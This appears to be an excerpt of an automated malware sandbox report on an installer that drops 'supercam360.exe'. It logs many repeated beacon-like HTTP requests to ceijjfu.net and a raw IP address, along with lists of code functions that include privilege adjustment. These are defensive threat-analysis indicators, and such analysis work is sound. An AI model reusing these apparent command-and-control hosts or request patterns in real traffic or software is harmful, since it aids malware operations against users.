                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1Host: ceijjfu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficDNS traffic detected: DNS query: ceijjfu.net
                    Source: supercam360.exe, 00000005.00000002.2919541859.0000000000AC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.196.9.67/
                    Source: supercam360.exe, 00000005.00000002.2920428954.00000000033BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.196.9.67/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14
                    Source: vc8Kx5C54G.tmp, vc8Kx5C54G.tmp, 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-MF7B1.tmp.1.dr, vc8Kx5C54G.tmp.0.drString found in binary or memory: http://www.innosetup.com/
                    Source: vc8Kx5C54G.exe, 00000000.00000003.1674056082.0000000002320000.00000004.00001000.00020000.00000000.sdmp, vc8Kx5C54G.exe, 00000000.00000003.1674199169.00000000020F8000.00000004.00001000.00020000.00000000.sdmp, vc8Kx5C54G.tmp, vc8Kx5C54G.tmp, 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-MF7B1.tmp.1.dr, vc8Kx5C54G.tmp.0.drString found in binary or memory: http://www.remobjects.com/ps
                    Source: vc8Kx5C54G.exe, 00000000.00000003.1674056082.0000000002320000.00000004.00001000.00020000.00000000.sdmp, vc8Kx5C54G.exe, 00000000.00000003.1674199169.00000000020F8000.00000004.00001000.00020000.00000000.sdmp, vc8Kx5C54G.tmp, 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-MF7B1.tmp.1.dr, vc8Kx5C54G.tmp.0.drString found in binary or memory: http://www.remobjects.com/psU
                    Source: vc8Kx5C54G.exe, 00000000.00000003.1673765629.00000000020F1000.00000004.00001000.00020000.00000000.sdmp, vc8Kx5C54G.exe, 00000000.00000003.1673699391.0000000002320000.00000004.00001000.00020000.00000000.sdmp, vc8Kx5C54G.exe, 00000000.00000002.2919435024.00000000020F1000.00000004.00001000.00020000.00000000.sdmp, vc8Kx5C54G.tmp, 00000001.00000002.2919530378.0000000000847000.00000004.00000020.00020000.00000000.sdmp, vc8Kx5C54G.tmp, 00000001.00000002.2919773684.00000000021A8000.00000004.00001000.00020000.00000000.sdmp, vc8Kx5C54G.tmp, 00000001.00000003.1675748927.00000000021A8000.00000004.00001000.00020000.00000000.sdmp, vc8Kx5C54G.tmp, 00000001.00000003.1675681601.00000000030F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.easycutstudio.com/support.html
                    Source: is-F7KI7.tmp.1.drBinary or memory string: DirectDrawCreateExmemstr_b62fb092-f
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: 1_2_0042F518 NtdllDefWindowProc_A,1_2_0042F518
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: 1_2_00423B7C NtdllDefWindowProc_A,1_2_00423B7C
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: 1_2_00478554 NtdllDefWindowProc_A,1_2_00478554
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: 1_2_004125D0 NtdllDefWindowProc_A,1_2_004125D0
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: 1_2_004573B4 PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A,1_2_004573B4
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: 1_2_0042E92C: CreateFileA,DeviceIoControl,GetLastError,CloseHandle,SetLastError,1_2_0042E92C
                    Source: C:\Users\user\Desktop\vc8Kx5C54G.exeCode function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,0_2_00409448
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: 1_2_004555B8 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,1_2_004555B8
                    Source: C:\Users\user\Desktop\vc8Kx5C54G.exeCode function: 0_2_0040840C0_2_0040840C
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: 1_2_004800021_2_00480002
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: 1_2_004704C81_2_004704C8
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: 1_2_004671CC1_2_004671CC
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: 1_2_004352C01_2_004352C0
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: 1_2_004861401_2_00486140
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: 1_2_004303541_2_00430354
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: 1_2_004444C01_2_004444C0
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: 1_2_004345BC1_2_004345BC
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: 1_2_00444A681_2_00444A68
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: 1_2_00430EE01_2_00430EE0
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: 1_2_0045EEEC1_2_0045EEEC
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: 1_2_0045AF941_2_0045AF94
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: 1_2_004870A01_2_004870A0
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: 1_2_004451601_2_00445160
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: 1_2_0046922C1_2_0046922C
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: 1_2_0048D4001_2_0048D400
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: 1_2_0044556C1_2_0044556C
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: 1_2_004519901_2_00451990
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: 1_2_0043DD481_2_0043DD48
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_004010515_2_00401051
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_00401C265_2_00401C26
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_004070A75_2_004070A7
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_609660FA5_2_609660FA
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_6092114F5_2_6092114F
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_6091F2C95_2_6091F2C9
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_6096923E5_2_6096923E
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_6093323D5_2_6093323D
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_6095C3145_2_6095C314
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_609503125_2_60950312
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_6094D33B5_2_6094D33B
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_6093B3685_2_6093B368
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_6096748C5_2_6096748C
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_6093F42E5_2_6093F42E
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_609544705_2_60954470
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_609615FA5_2_609615FA
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_6096A5EE5_2_6096A5EE
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_6096D6A45_2_6096D6A4
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_609606A85_2_609606A8
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_609326545_2_60932654
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_609556655_2_60955665
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_6094B7DB5_2_6094B7DB
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_6092F74D5_2_6092F74D
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_609648075_2_60964807
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_6094E9BC5_2_6094E9BC
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_609379295_2_60937929
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_6093FAD65_2_6093FAD6
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_6096DAE85_2_6096DAE8
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_6094DA3A5_2_6094DA3A
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_60936B275_2_60936B27
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_60954CF65_2_60954CF6
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_60950C6B5_2_60950C6B
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_60966DF15_2_60966DF1
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_60963D355_2_60963D35
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_60909E9C5_2_60909E9C
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_60951E865_2_60951E86
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_60912E0B5_2_60912E0B
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_60954FF85_2_60954FF8
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_02D7E24D5_2_02D7E24D
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_02D6F0795_2_02D6F079
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_02D84EE95_2_02D84EE9
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_02D82E745_2_02D82E74
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_02D7E6655_2_02D7E665
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_02D79F445_2_02D79F44
